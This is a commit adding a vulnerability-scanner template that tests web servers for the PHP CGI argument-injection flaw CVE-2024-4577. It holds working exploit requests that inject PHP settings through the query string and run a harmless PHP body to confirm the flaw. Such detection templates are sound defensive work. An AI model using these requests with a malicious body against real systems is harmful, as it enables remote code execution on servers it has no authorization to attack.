Merge pull request #9997 from Kazgangap/cve-2024-4577

add cve-2024-4577
2024-06-09 23:43:05 +04:00 · 2024-06-09 23:43:05 +04:00 · f60d4682f0
parent a18ae11040 14a5c9bf8a
commit f60d4682f0
1 changed files with 33 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-4577.yaml
+++ b/http/cves/2024/CVE-2024-4577.yaml
@ -0,0 +1,33 @@
+id: CVE-2024-4577
+
+info:
+  name: PHP CGI - Argument Injection
+  author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch
+  severity: critical
+  description: |
+    PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.
+  impact: |
+    Successful exploitation could lead to remote code execution on the affected system.
+  remediation: |
+    Apply the vendor-supplied patches or upgrade to a non-vulnerable version.
+  metadata:
+    verified: true
+  tags: cve,cve2024,php,cgi,rce
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
+      - "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
+      - "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
+      - "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
+
+    body: |
+      <?php echo md5("CVE-2024-4577"); ?>
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"